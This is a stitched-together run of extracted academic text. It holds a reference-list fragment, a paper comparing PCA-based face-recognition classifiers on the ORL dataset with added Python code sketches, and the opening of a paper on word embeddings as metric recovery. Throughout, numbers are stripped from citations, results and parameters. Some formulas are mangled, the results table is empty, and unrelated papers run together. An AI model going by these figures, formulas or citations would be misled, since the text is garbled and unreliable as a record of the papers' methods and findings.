/pnas. http://dx.doi.org/ . /peerj-cs. ramirez i, sprechmann p, sapiro g. . 
classification and clustering via dictionary learning with structured incoherence and shared features. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . rodríguez-fdez i, canosa a, mucientes m, bugarín a. . stac: a web platform for the comparison of algorithms using statistical tests. in: fuzzy systems (fuzz-ieee), ieee international conference on. piscataway: ieee, – . ross bc. . mutual information between discrete and continuous data sets. plos one ( ):e doi . /journal.pone. . saeys y, inza i, larrañaga p. . a review of feature selection techniques in bioinfor- matics. bioinformatics ( ): – doi . /bioinformatics/btm . sokolova m, lapalme g. . a systematic analysis of performance measures for classification tasks. information processing & management ( ): – doi . /j.ipm. . . . staiano a, de vinco l, ciaramella a, raiconi g, tagliaferri r, amato r, longo g, donalek c, miele g, di bernardo d. . probabilistic principal surfaces for yeast gene microarray data mining. in: proceedings of the fourth ieee international conference on data mining, icdm . piscataway: ieee, – . staiano a, di taranto md, bloise e, d’agostino mn, d’angelo a, marotta g, gentile m, jossa f, iannuzzi a, rubba p, fortunato g. . investigation of single nucleotide polymorphisms associated to familial combined hyperlipidemia with random forests. in: neural nets and surroundings. vol. ( ). berlin, heidelberg: springer, – . su ai, welsh jb, sapinoso lm, kern sg, dimitrov p, lapp h, schultz pg, powell sm, moskaluk ca, frierson h, hampton gm. . molecular classification of human carcinomas by use of gene expression signatures. cancer research ( ): – . tang j, alelyani s, liu h. . feature selection for classification: a review. in: data classification: algorithms and applications. boca raton: crc press, – doi . /b . tibshirani r. . regression shrinkage and selection via the lasso. journal of the royal statistical society, series b : – . wolpert dh, macready wg. . no free lunch theorems for optimization. ieee transactions on evolutionary computation ( ): – doi . / . . xiong m, fang x, zhao j. . biomarker identification by feature wrappers. genome research ( ): – doi . /gr. . yang k, cai z, li j, lin g. . a stable gene selection in microarray data analysis. bmc bioinformatics ( ): doi . / - - - . zou h, hastie t. . regularization and variable selection via the elastic net. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /j. - . . .x. nardone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /j.ipm. . . http://dx.doi.org/ . /b http://dx.doi.org/ . / . http://dx.doi.org/ . /gr. http://dx.doi.org/ . / - - - http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . 
/ijanmc- -

a comparative study of face recognition classification algorithms

wang changyuan, school of computer science and engineering, xi'an technological university, xi'an, china. e-mail: cyw @ .com
li guang, northwest institutes of advanced technology, xi'an technological university, xi'an, china. e-mail: @qq.com
xue pengxiang, school of computer science and engineering, xi'an technological university, xi'an, china. e-mail: xuepx@xatu.edu.cn
wu qiyou, school of computer science and engineering, xi'an technological university, xi'an, china. e-mail: @qq.com

abstract—because different classification algorithms in machine learning have different classification effects and accuracies, it is not obvious to researchers which classification algorithm to choose. this paper uses the face data published by cambridge university as the experimental data set. the experiment first reduces the dimensionality of the data with the principal component analysis (pca) algorithm to extract the main features, and then classifies the result with linear logistic classification, linear discriminant analysis (lda), the nearest neighbor algorithm (knn), the support vector machine (svm) and the ensemble algorithm adaboost. the advantages and disadvantages of the classification performance and complexity of the different algorithms are compared, using accuracy, recall, f1-score and auc as evaluation indicators.

keywords—classification algorithm; machine learning; face recognition; model evaluation

i. introduction
with the rise of artificial intelligence and machine learning, face recognition technology is widely used in daily life, for example in station security checks, time-and-attendance systems and secure payment [ - ], but different face recognition devices use different algorithms. therefore, this paper analyzes and compares the classification algorithms commonly used in face recognition. the data set used in this paper is the orl face data set published by cambridge university in the united kingdom. the methods considered are linear logistic regression, linear discriminant analysis (lda), k-nearest neighbor (knn), support vector machine (svm), naïve bayes (nb) and related methods; the definition, advantages and disadvantages of each method are briefly explained. finally, the five methods are compared and analyzed according to evaluation indicators commonly used in machine learning, such as the accuracy rate, recall rate, f1-score and auc area.

ii. related work
a. principal component analysis (pca) data dimensionality reduction
the data set contains a total of photos. we use the machine learning library scikit-learn provided by python to process the data; part of the data set is shown in figure .

figure . orl partial face images

each picture in the experimental data has features. since the number of features is much greater than the number of samples, it is easy to overfit during training. therefore, a principal component analysis algorithm is required to reduce the dimensionality of the features and select k main features as the input of the data set. the main idea of pca [ ] is to use the covariance matrix to calculate the degree of dispersion of the samples in different directions, and to select the directions with the largest variance as the main directions of the sample set. the processing steps are:
a) data preprocessing: normalize and scale the data first.
normalization makes the mean value of the data features 0, and scaling handles the case where feature values differ by an order of magnitude.
b) calculate the covariance matrix and eigenvectors of the processed data. the eigenvectors can be obtained by singular value decomposition.
c) retain the eigenvectors and eigenvalues corresponding to the largest first k eigenvalues to form an orthogonal basis.
d) project the samples into the low-dimensional space; the dimensionality-reduced data can represent the original samples approximately, but with a certain degree of distortion.

this paper uses formula ( ) to calculate the distortion of pca:

$$\frac{\frac{1}{m}\sum_{i=1}^{m}\left\|x^{(i)}-x_{approx}^{(i)}\right\|^{2}}{\frac{1}{m}\sum_{i=1}^{m}\left\|x^{(i)}\right\|^{2}}$$

through scikit-learn processing, the reduction rate after dimensionality reduction obtained from the pca model is shown in figure . it can be seen from the figure that the larger the value of k, the smaller the distortion rate; as k continues to increase, the data reduction rate approaches its limit. using this rule, we choose k between and , sampling every th value, and compute the reduction rate over the k features of all samples after processing with the pca algorithm. we select reduction ratios of %, %, %, and %, with corresponding k values of , , , and , and display the corresponding pictures after pca processing: the first row shows the original images, and each following row corresponds to the pictures at a different reduction rate; the lower the reduction rate, the more blurred the image, as shown in figure .

figure . relationship between reduction rate and k characteristics

b. research on classification methods
1) logistic regression
supervised learning is the most widely used branch of machine learning in industry, and classification and regression are its main methods. the linear classifier is the most basic and commonly used machine learning model. this paper uses linear logistic regression to classify and recognize faces. the prediction function of linear regression is:

$$h_{\theta}(x)=\theta^{T}x=\theta_{0}x_{0}+\theta_{1}x_{1}+\cdots+\theta_{n}x_{n}$$

where $h_{\theta}(x)$ is the prediction function and x is the feature vector. to handle the classification problem, we want the value of the function to lie in [0, 1], so we introduce the sigmoid function:

$$g(z)=\frac{1}{1+e^{-z}}$$

combined with the linear regression prediction function:

$$h_{\theta}(x)=g(\theta^{T}x)=\frac{1}{1+e^{-\theta^{T}x}}$$

for a simple binary classification into class a or class b, we can use the sigmoid as the probability density function of the sample, and the classification result for an input can be expressed as a probability:

$$p(y=1\,|\,x;\theta)=h_{\theta}(x),\qquad p(y=0\,|\,x;\theta)=1-h_{\theta}(x)$$

the cost function describes the difference between the predicted value and the true value of the model; when there are multiple data samples, the average of the per-sample costs is taken, and it is denoted j(θ). based on maximum likelihood estimation, the cost function j(θ) is:

$$j(\theta)=-\frac{1}{m}\sum_{i=1}^{m}\left[y^{(i)}\log h_{\theta}(x^{(i)})+(1-y^{(i)})\log\left(1-h_{\theta}(x^{(i)})\right)\right]$$
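a minimal sketch of this pca + logistic regression pipeline with scikit-learn is given below. it uses `fetch_olivetti_faces` (the at&t/orl images shipped with scikit-learn) as a stand-in for the orl data used in the paper; the variance threshold, train/test split and other hyperparameters are illustrative assumptions, not the authors' exact settings.

```python
import numpy as np
from sklearn.datasets import fetch_olivetti_faces
from sklearn.decomposition import PCA
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline

# the olivetti faces in scikit-learn are the at&t/orl images:
# 400 pictures of 40 subjects, 64x64 pixels flattened to 4096 features.
faces = fetch_olivetti_faces()
X, y = faces.data, faces.target

X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.3, stratify=y, random_state=0)

# keep enough components to retain ~95% of the variance (one possible
# "reduction rate"); svd_solver="full" is required for a float threshold.
model = make_pipeline(
    PCA(n_components=0.95, svd_solver="full", whiten=True, random_state=0),
    LogisticRegression(max_iter=1000),
)
model.fit(X_train, y_train)

print("components kept:", model.named_steps["pca"].n_components_)
print("test accuracy:", model.score(X_test, y_test))

# the pca distortion of the formula above can be checked directly:
pca = model.named_steps["pca"]
X_approx = pca.inverse_transform(pca.transform(X_test))
distortion = np.sum((X_test - X_approx) ** 2) / np.sum(X_test ** 2)
print("relative reconstruction error:", distortion)
```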
2) linear discriminant analysis (lda)
linear discriminant analysis (lda) [ , ], also known as fisher linear discriminant (fld), was introduced into the field of machine learning by belhumeur. lda is a supervised dimensionality reduction technique which can not only reduce the dimensionality but also classify, by projecting the data features from a high-dimensional space into a low-dimensional space. the core idea is that, after projection, the projected points of the same category should be as close as possible, while the distance between the centers of different categories should be as large as possible [ ]. if the data set consists of two classes with class centers $u_{1}$ and $u_{2}$, the within-class scatter matrix is

$$s_{w}=\sum_{x\in x_{1}}(x-u_{1})(x-u_{1})^{T}+\sum_{x\in x_{2}}(x-u_{2})(x-u_{2})^{T}$$

and the between-class scatter matrix is

$$s_{b}=(u_{1}-u_{2})(u_{1}-u_{2})^{T}$$

3) knn
among the n training samples, find the k nearest neighbors of the test sample x. suppose there are m training samples in the data set belonging to c categories $\omega_{1},\ldots,\omega_{c}$, and let the test sample be x. the knn algorithm can then be described as follows: find the k neighbors of x among the m training samples; if the numbers of these neighbors belonging to categories $\omega_{1},\ldots,\omega_{c}$ are $k_{1},\ldots,k_{c}$, then the discriminant function is

$$g_{i}(x)=k_{i},\qquad i=1,2,\ldots,c$$

and x is assigned to the category with the largest $g_{i}(x)$. the core idea of the k-nearest neighbor algorithm [ ] is to calculate the distance between the unlabeled sample and every sample in the data set, take the k nearest samples, and then let these k neighbors vote to decide the class of the unlabeled sample. knn classification steps:
a) prepare the training sample set x, which contains n training samples, and select an appropriate distance measure according to the specific requirements; we use dis(xa, xb) to represent the distance between xa and xb in the sample set.
b) for the test sample x, use the distance measure to calculate the distance between x and the n training samples, obtaining the distance set $dis=\{dis(x,x_{1}),dis(x,x_{2}),\ldots,dis(x,x_{n})\}$.
c) sort the distance set, select the k smallest elements, and retrieve the k samples corresponding to these elements.
d) count the categories of these k samples and obtain the final classification result by voting.
assuming that x_test is an unlabeled sample and x_train is a labeled sample set, the algorithm is shown in figure .

figure . k-nearest neighbor algorithm

for the distance measure, the euclidean distance, manhattan distance, chebyshev distance, etc. are usually used; generally the euclidean distance is the most common, e.g., for two points a and b in n-dimensional euclidean space:

$$d(a,b)=\sqrt{\sum_{i=1}^{n}(a_{i}-b_{i})^{2}}$$
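a compact numpy sketch of steps a)–d) above (euclidean distance, take the k smallest, majority vote) follows; k and the toy data are illustrative choices, not taken from the paper.

```python
import numpy as np
from collections import Counter

def knn_predict(X_train, y_train, x_test, k=5):
    """classify one test sample by majority vote among its k nearest
    training samples, using the euclidean distance defined above."""
    # steps a/b: distance between x_test and every training sample
    dists = np.sqrt(np.sum((X_train - x_test) ** 2, axis=1))
    # step c: indices of the k smallest distances
    nearest = np.argsort(dists)[:k]
    # step d: vote among the labels of the k neighbours
    votes = Counter(y_train[nearest])
    return votes.most_common(1)[0][0]

# tiny illustrative example with two gaussian blobs
rng = np.random.default_rng(0)
X_train = np.vstack([rng.normal(0, 1, (20, 2)), rng.normal(4, 1, (20, 2))])
y_train = np.array([0] * 20 + [1] * 20)
print(knn_predict(X_train, y_train, np.array([3.5, 3.9]), k=5))  # -> 1
```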
4) svm
the support vector machine (svm) [ ] is a very important and widely used machine learning algorithm. its starting point is to find the optimal decision boundary, the one that is as far as possible from both classes of data points; the data points closest to the boundary are defined as support vectors. the goal therefore becomes to find the straight line (in higher dimensions, the hyperplane) that has the largest distance to the support vectors. this makes the generalization ability of the model as good as possible, so the svm prediction on future data is also more accurate, as shown in figure ; we look for the boundary with the largest margin.

figure . classification model diagram

let this plane be represented by g(x) = 0 and its normal vector by w; the actual (geometric) distance between a point and the plane is denoted r, and the distance from the plane can also be measured by the absolute value of g(x) (called the functional margin). the hard-margin objective is

$$\min_{w,b}\ \frac{1}{2}\|w\|^{2}\qquad \text{s.t.}\quad y_{i}(w^{T}x_{i}+b)\geq 1,\quad i=1,\ldots,l$$

the penalty function is a kind of restriction function: for constrained nonlinear programming, the constraint function is called a penalty function, and its coefficient is called the penalty factor. the objective function of the svm (soft-margin support vector machine) with penalty factor c is

$$\min_{w,b,\xi}\ \frac{1}{2}\|w\|^{2}+c\sum_{i=1}^{l}\xi_{i}$$

figure . introduction of c, classification model diagram

advantages of svm:
a) non-linear mapping is the theoretical basis of the svm method; svm uses an inner-product kernel function to replace the explicit nonlinear mapping to a high-dimensional space;
b) finding the optimal hyperplane that divides the feature space is the goal of svm, and the idea of maximizing the classification margin is the core of the svm method;
c) the support vectors are the training result of svm; it is the support vectors that play the decisive role in the svm classification decision;
d) svm is a novel small-sample learning method with a solid theoretical foundation. it basically does not involve probability measures or the law of large numbers, so it differs from existing statistical methods. in essence, it avoids the traditional process from induction to deduction, realizes efficient "transduction inference" from training samples to prediction samples, and greatly simplifies the usual classification and regression problems.
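the sketch below shows how the penalty factor c of the soft-margin objective is exposed in scikit-learn and tuned by cross-validation; the grid of c values, the number of pca components and the use of the olivetti (at&t/orl) faces are illustrative assumptions rather than the paper's actual configuration.

```python
from sklearn.datasets import fetch_olivetti_faces
from sklearn.decomposition import PCA
from sklearn.model_selection import GridSearchCV, train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC

faces = fetch_olivetti_faces()
X_train, X_test, y_train, y_test = train_test_split(
    faces.data, faces.target, test_size=0.3, stratify=faces.target, random_state=0)

# SVC's C is exactly the penalty factor of the soft-margin objective above:
# a small C tolerates more margin violations, a large C penalizes them harder.
pipeline = make_pipeline(
    PCA(n_components=100, whiten=True, random_state=0),
    SVC(kernel="linear"),
)
grid = GridSearchCV(pipeline, {"svc__C": [0.01, 0.1, 1, 10, 100]}, cv=5)
grid.fit(X_train, y_train)

print("best C:", grid.best_params_["svc__C"])
print("test accuracy:", grid.score(X_test, y_test))
```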
there are two possibilities for the prediction results, that is, the positive prediction is positive (tp), and the negative prediction is positive (fp), the formula is: fptp tp p   ( ) the recall rate refers to our original sample, indicating how many positive examples in the sample were predicted correctly. there are also two possibilities, that is, the original positive class is predicted as a positive class (tp), and the other is to predict the original positive class as a negative class (fn). fntp tp r   ( ) f combines the results of precision rate and recall rate. when f is higher, it means that the verification method is more effective. rp pr f   ( ) table i. the comparison of experimental results of five classification algorithms pca+lr pca+lda pca+svm pca+knn pca+nb precision (%) recall (%) fl-score (%) iv. conclusion face recognition technology [ ] has become one of the most popular research directions in computer vision and has made great achievements. with the development of computer technology, more and more classification methods will appear. this thesis is only through several common mainstream classification methods for experimental analysis and comparison. through experiments, it is found that the pca + linear logic classification method has obvious advantages in accuracy rate and recall rate. however, specific analysis should be combined with specific issues. then i am ready to do experiments on different data sets, understand more classification algorithms, and constantly improve my results. international journal of advanced network, monitoring and controls volume , no. , references [ ] wu xiaotian. research on face recognition algorithm in subway security inspection [d]. dalian jiaotong university, . [ ] chen fuqiang. research on invalid face filtering method in video attendance [d]. southwest jiaotong university, . [ ] ma yukun. research on key technologies of face-based secure identity authentication [d]. beijing university of technology, . [ ] pattern analysis; new pattern analysis findings from king saud university discussed (pcapool: unsupervised feature learning for face recognition using pca, lbp, and pyramid pooling) [j]. journal of robotics & machine learning, . [ ] zhang yuting, chen junhua, yang xinkai, zhang liyan. an improved pca+lda face recognition algorithm [j]. computer knowledge and technology, , ( ): - . [ ] guan‐hua huang, chih‐hsuan lin, yu‐ren cai, tai‐been chen, shih‐yen hsu, nan‐han lu, huei‐yung chen, yi‐chen wu. multiclass machine learning classification of functional brain images for parkinson's disease stage prediction [j]. statistical analysis and data mining: the asa data science journal, , ( ). [ ] ou lisong. design and improvement of face recognition system based on svm [j]. network security technology and application, ( ): - . [ ]liu jie, song bo. naive bayesian classifier based on genetic simulated annealing algorithm [j]. procedia engineering, , . [ ] tie fuzhen. application of face recognition system in hotel industry [j]. computer products and circulation, ( ): + . [ ] jiang ajuan, zhang wenjuan. a summary of face recognition [j]. computer knowledge and technology, , ( ): - + . [ ] youqiang zhang, guo cao, bisheng wang, xuesong li. a novel ensemble method for k -nearest neighbor [j]. pattern recognition, , . word embeddings as metric recovery in semantic spaces tatsunori b. hashimoto, david alvarez-melis and tommi s. 
jaakkola csail, massachusetts institute of technology {thashim, davidam, tommi}@csail.mit.edu abstract continuous word representations have been remarkably useful across nlp tasks but re- main poorly understood. we ground word embeddings in semantic spaces studied in the cognitive-psychometric literature, taking these spaces as the primary objects to recover. to this end, we relate log co-occurrences of words in large corpora to semantic similarity assessments and show that co-occurrences are indeed consistent with an euclidean semantic space hypothesis. framing word embedding as metric recovery of a semantic space uni- fies existing word embedding algorithms, ties them to manifold learning, and demonstrates that existing algorithms are consistent metric recovery methods given co-occurrence counts from random walks. furthermore, we propose a simple, principled, direct metric recovery al- gorithm that performs on par with the state-of- the-art word embedding and manifold learning methods. finally, we complement recent fo- cus on analogies by constructing two new in- ductive reasoning datasets—series completion and classification—and demonstrate that word embeddings can be used to solve them as well. introduction continuous space models of words, objects, and sig- nals have become ubiquitous tools for learning rich representations of data, from natural language pro- cessing to computer vision. specifically, there has been particular interest in word embeddings, largely due to their intriguing semantic properties (mikolov et al., b) and their success as features for down- stream natural language processing tasks, such as named entity recognition (turian et al., ) and parsing (socher et al., ). the empirical success of word embeddings has prompted a parallel body of work that seeks to better understand their properties, associated estimation al- gorithms, and explore possible revisions. recently, levy and goldberg ( a) showed that linear lin- guistic regularities first observed with word vec extend to other embedding methods. in particu- lar, explicit representations of words in terms of co- occurrence counts can be used to solve analogies in the same way. in terms of algorithms, levy and goldberg ( b) demonstrated that the global min- imum of the skip-gram method with negative sam- pling of mikolov et al. ( b) implicitly factorizes a shifted version of the pointwise mutual informa- tion (pmi) matrix of word-context pairs. arora et al. ( ) explored links between random walks and word embeddings, relating them to contextual (prob- ability ratio) analogies, under specific (isotropic) as- sumptions about word vectors. in this work, we take semantic spaces stud- ied in the cognitive-psychometric literature as the prototypical objects that word embedding algo- rithms estimate. semantic spaces are vector spaces over concepts where euclidean distances between points are assumed to indicate semantic similar- ities. we link such semantic spaces to word co-occurrences through semantic similarity assess- ments, and demonstrate that the observed co- occurrence counts indeed possess statistical proper- ties that are consistent with an underlying euclidean space where distances are linked to semantic simi- larity. transactions of the association for computational linguistics, vol. , pp. – , . action editor: scott yih. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. 
figure : inductive reasoning in semantic space proposed in sternberg and gardner ( ): analogy, series completion and classification. a, b, c are given, i is the ideal point and d are the choices; the correct answer is shaded green.

formally, we view word embedding methods as performing metric recovery. this perspective is significantly different from current approaches. instead of aiming for representations that exhibit specific semantic properties or that perform well at a particular task, we seek methods that recover the underlying metric of the hypothesized semantic space. the clearer foundation afforded by this perspective enables us to analyze word embedding algorithms in a principled task-independent fashion. in particular, we ask whether word embedding algorithms are able to recover the metric under specific scenarios. to this end, we unify existing word embedding algorithms as statistically consistent metric recovery methods under the theoretical assumption that co-occurrences arise from (metric) random walks over semantic spaces. the new setting also suggests a simple and direct recovery algorithm which we evaluate and compare against other embedding methods.

the main contributions of this work can be summarized as follows:
• we ground word embeddings in semantic spaces via log co-occurrence counts. we show that pmi (pointwise mutual information) relates linearly to human similarity assessments, and that nearest-neighbor statistics (centrality and reciprocity) are consistent with a euclidean space hypothesis (sections and ).
• in contrast to prior work (arora et al., ), we take metric recovery as the key object of study, unifying existing algorithms as consistent metric recovery methods based on co-occurrence counts from simple markov random walks over graphs and manifolds. this strong link to manifold estimation opens a promising direction for extensions of word embedding methods (sections , and ).
• we propose and evaluate a new principled direct metric recovery algorithm that performs comparably to the existing state of the art on both word embedding and manifold learning tasks, and show that glove (pennington et al., ) is closely related to the second-order taylor expansion of our objective.
• we construct and make available two new inductive reasoning datasets (series completion and classification) to extend the evaluation of word representations beyond analogies, and demonstrate that these tasks can be solved with vector operations on word embeddings as well (examples in table ).

word vectors and semantic spaces
most current word embedding algorithms build on the distributional hypothesis (harris, ), where similar contexts imply similar meanings, so as to tie co-occurrences of words to their underlying meanings. the relationship between semantics and co-occurrences has also been studied in psychometrics and cognitive science (rumelhart and abrahamson, ; sternberg and gardner, ), often by means of free word association tasks and semantic spaces. the semantic spaces, in particular, provide a natural conceptual framework for continuous representations of words as vector spaces where semantically related words are close to each other.
for example, the observation that word embeddings can solve analogies was already shown by rumelhart and abrahamson ( ) using vector representations of words derived from surveys of pairwise word similarity judgments.

table : examples of the three inductive reasoning tasks proposed by sternberg and gardner ( ).
task | prompt | answer
analogy | king:man::queen:? | woman
series | penny:nickel:dime:? | quarter
classification | horse:zebra:{deer, dog, fish} | deer

(the new inductive reasoning datasets are available at http://web.mit.edu/thashim/www/supplement materials.zip.)

a fundamental question regarding vector space models of words is whether a euclidean vector space is a valid representation of semantic concepts. there is substantial empirical evidence in favor of this hypothesis. for example, rumelhart and abrahamson ( ) showed experimentally that analogical problem solving with fictitious words and human mistake rates were consistent with a euclidean space. sternberg and gardner ( ) provided further evidence supporting this hypothesis, proposing that general inductive reasoning was based upon operations in metric embeddings. using the analogy, series completion and classification tasks shown in table as testbeds, they proposed that subjects solve these problems by finding the word closest (in semantic space) to an ideal point: the vertex of a parallelogram for analogies, a displacement from the last word in series completion, and the centroid in the case of classification (figure ).

we use semantic spaces as the prototypical structures that word embedding methods attempt to uncover, and we investigate the suitability of word co-occurrence counts for doing so. in the next section, we show that co-occurrences from large corpora indeed relate to semantic similarity assessments, and that the resulting metric is consistent with a euclidean semantic space hypothesis.

the semantic space of log co-occurrences
most word embedding algorithms are based on word co-occurrence counts. in order for such methods to uncover an underlying euclidean semantic space, we must demonstrate that co-occurrences themselves are indeed consistent with some semantic space. we must relate co-occurrences to semantic similarity assessments, on one hand, and show that they can be embedded into a euclidean metric space, on the other. we provide here empirical evidence for both of these premises.

figure : normalized log co-occurrence (pmi) linearly correlates with human semantic similarity judgments (men survey).

we commence by demonstrating in figure that the pointwise mutual information (church and hanks, ) evaluated from co-occurrence counts has a strong linear relationship with semantic similarity judgments from survey data (pearson's r = . ). however, this suggestive linear relationship does not by itself demonstrate that log co-occurrences (with normalization) can be used to define a euclidean metric space.

earlier psychometric studies have asked whether human semantic similarity evaluations are consistent with a euclidean space. for example, tversky and hutchinson ( ) investigate whether concept representations are consistent with the geometric sampling (gs) model: a generative model in which points are drawn independently from a continuous distribution in a euclidean space. they use two nearest neighbor statistics to test agreement with this model, and conclude that certain hierarchical vocabularies are not consistent with a euclidean embedding. similar results are observed by griffiths et al. ( ).
we extend this embeddability analysis to lexical co-occurrences and show that semantic similarity estimates derived from them are mostly consistent with a euclidean space hypothesis.

the first test statistic for the gs model, the centrality c, is defined as

$$c=\frac{1}{n}\sum_{i=1}^{n}\Big(\sum_{j=1}^{n}n_{ij}\Big)^{2}$$

where $n_{ij}=1$ iff i is j's nearest neighbor. under the gs model (i.e., when the words are consistent with a euclidean space representation), c ≤ with high probability as the number of words n → ∞, regardless of the dimension or the underlying density (tversky and hutchinson, ). for metrically embeddable data, typical non-asymptotic values of c range between and , while non-embeddable hierarchical structures have c > . (normalizing the log co-occurrence with the unigram frequency taken to the / th power maximizes the linear correlation in figure , explaining this choice of normalization in prior work (levy and goldberg, a; mikolov et al., b).)

the second statistic, the reciprocity fraction rf (schwarz and tversky, ; tversky and hutchinson, ), is defined as

$$rf=\frac{1}{n}\sum_{i=1}^{n}\sum_{j=1}^{n}n_{ij}\,n_{ji}$$

and measures the fraction of words that are their nearest neighbor's nearest neighbor. under the gs model, this fraction should be greater than . .

table : semantic similarity data derived from multiple sources show evidence of embeddability (c and rf for the free association data, the wikipedia corpus, the word vec corpus, and the glove corpus).

table shows the two statistics computed on three popular large corpora and a free word association dataset (see section for details). the nearest neighbor calculations are based on pmi. the results show a surprisingly high agreement on all three statistics for all corpora, with c and rf contained in small intervals: c ∈ [ . , . ] and rf ∈ [ . , . ]. these results are consistent with euclidean semantic spaces and the gs model in particular. the largest violators of c and rf are consistent with tversky's analysis: the word with the largest centrality in the non-stopword wikipedia corpus is 'the', whose inclusion would increase c to . compared to . without it. tversky's original analysis of semantic similarities argued that certain words, such as superordinate and function words, could not be embedded. despite such specific exceptions, we find that for an appropriately normalized corpus, the majority of words are consistent with the gs model, and can therefore be represented meaningfully as vectors in euclidean space.

the results of this section are an important step towards justifying the use of word co-occurrence counts as the central object of interest for semantic vector representations of words. we have shown that they are empirically related to a human notion of semantic similarity and that they are metrically embeddable, a desirable condition if we expect word vectors derived from them to truly behave as elements of a metric space. (both rf and c are asymptotically dimension independent because they rely only on the single nearest neighbor; estimating the latent dimensionality requires other measures and assumptions (kleindessner and von luxburg, ).) this, however, does not yet fully justify their use to derive semantic representations. the missing piece is to formalize the connection between these co-occurrence counts and some intrinsic notion of semantics, such as the semantic spaces described in section . in the next two sections, we establish this connection by framing word embedding algorithms that operate on co-occurrences as metric recovery methods.
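a small numpy sketch of the two nearest-neighbour statistics, as reconstructed above (c as the mean squared in-degree of the nearest-neighbour graph, rf as the fraction of mutual nearest neighbours), is given below. it works on any similarity matrix; the random matrix here is only a stand-in for the pmi similarities used in the paper.

```python
import numpy as np

def nn_statistics(similarity):
    """centrality c and reciprocity fraction rf of the nearest-neighbour
    graph induced by an (n x n) similarity matrix."""
    n = similarity.shape[0]
    sim = similarity.astype(float).copy()
    np.fill_diagonal(sim, -np.inf)       # a word is not its own neighbour
    nn = sim.argmax(axis=1)              # nearest neighbour of each word

    # N[i, j] = 1 iff i is j's nearest neighbour
    N = np.zeros((n, n))
    N[nn, np.arange(n)] = 1.0

    centrality = np.mean(N.sum(axis=1) ** 2)   # mean squared in-degree
    reciprocity = np.sum(N * N.T) / n          # mutual nearest neighbours
    return centrality, reciprocity

# illustrative usage: a symmetric random matrix in place of pmi similarities
rng = np.random.default_rng(0)
S = rng.normal(size=(500, 500))
S = (S + S.T) / 2
c, rf = nn_statistics(S)
print(f"c = {c:.2f}, rf = {rf:.2f}")
```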
semantic spaces and manifolds
we take a broader, unified view on metric recovery of semantic spaces, since the notion of semantic spaces and the associated parallelogram rule for analogical reasoning extend naturally to objects other than words. for example, images can be approximately viewed as points in a euclidean semantic space by representing them in terms of their underlying degrees of freedom (e.g., orientation, illumination). thus, questions about the underlying semantic spaces and how they can be recovered should be related.

the problem of recovering an intrinsic euclidean coordinate system over objects has been specifically addressed in manifold learning. for example, methods such as isomap (tenenbaum et al., ) reconstitute a euclidean space over objects (when possible) based on local comparisons. intuitively, these methods assume that naive distance metrics such as the l distance over pixels in an image may be meaningful only when images are very similar. longer distances between objects are evaluated through a series of local comparisons. these longer distances (geodesic distances over the manifold) can be approximated by shortest paths on a neighborhood graph. if we view the geodesic distances on the manifold (represented as a graph) as semantic distances, then the goal is to isometrically embed these distances into a euclidean space. tenenbaum ( ) showed that such isometric embeddings of image manifolds can be used to solve "visual analogies" via the parallelogram rule.

typical approaches to manifold learning as discussed above differ from word embedding in terms of how the semantic distances between objects are extracted. word embeddings approximate semantic distances between words using the negative log co-occurrence counts (section ), while manifold learning approximates semantic distances using neighborhood graphs built from local comparisons of the original, high-dimensional points. both views seek to estimate a latent geodesic distance. in order to study the problem of metric recovery from co-occurrence counts, and to formalize the connection between word embedding and manifold learning, we introduce a simple random walk model over the underlying objects (e.g., words or images). this toy model permits us to establish clean consistency results for recovery algorithms. we emphasize that while the random walk is introduced over the words, it is not intended as a model of language but rather as a tool to understand the recovery problem.

. random walk model
consider now a simple metric random walk $x_{t}$ over words, where the probability of transitioning from word i to word j is given by

$$p(x_{t}=j\,|\,x_{t-1}=i)=h\!\left(\frac{\|x_{i}-x_{j}\|^{2}}{\sigma^{2}}\right)$$

here $\|x_{i}-x_{j}\|$ is the euclidean distance between words in the underlying semantic space to be recovered, and h is some unknown, sub-gaussian function linking semantic similarity to co-occurrence. under this model, the log frequency of occurrences of word j immediately after word i will be proportional to $\log h(\|x_{i}-x_{j}\|^{2}/\sigma^{2})$ as the corpus size grows large. here we make the surprising observation that if we consider co-occurrences over a sufficiently large window, the log co-occurrence instead converges to $-\|x_{i}-x_{j}\|^{2}/\sigma^{2}$, i.e., it relates directly to the underlying metric. intuitively, this result is an analog of the central limit theorem for random walks; note that, for this reason, we do not need to know the link function h.
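a toy, qualitative check of this effect can be written in a few lines of numpy, as sketched below. it assumes a gaussian link h, computes the expected windowed co-occurrences analytically (rather than simulating a corpus), and removes the per-word normalizers by double-centering; the point set, window size and bandwidth are arbitrary choices, and at these small scales the agreement with the squared distances is only approximate, since the formal statement below concerns the joint limit of corpus and vocabulary size.

```python
import numpy as np

rng = np.random.default_rng(0)
n, sigma, window = 300, 0.15, 10

# latent "semantic" coordinates of n words
X = rng.uniform(0, 1, size=(n, 2))
sq_dist = ((X[:, None, :] - X[None, :, :]) ** 2).sum(-1)

# metric random walk: p(j | i) proportional to h(||x_i - x_j||^2 / sigma^2),
# here with a gaussian link h (the model only requires h to be sub-gaussian)
K = np.exp(-sq_dist / sigma**2)
np.fill_diagonal(K, 0.0)
pi = K.sum(axis=1) / K.sum()               # stationary distribution (reversible chain)
P = K / K.sum(axis=1, keepdims=True)

# expected co-occurrence "counts" over a window of t = 1..window steps
C = np.zeros((n, n))
Pt = np.eye(n)
for _ in range(window):
    Pt = Pt @ P
    C += pi[:, None] * Pt

# remove the per-word normalizers a_i, b_j by double-centering, then compare
def double_center(M):
    M = M - M.mean(axis=1, keepdims=True)
    return M - M.mean(axis=0, keepdims=True)

mask = ~np.eye(n, dtype=bool)
logC = double_center(-np.log(C))
D = double_center(sq_dist)
print("correlation(-log C, squared distance):",
      np.corrcoef(logC[mask], D[mask])[0, 1])
```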
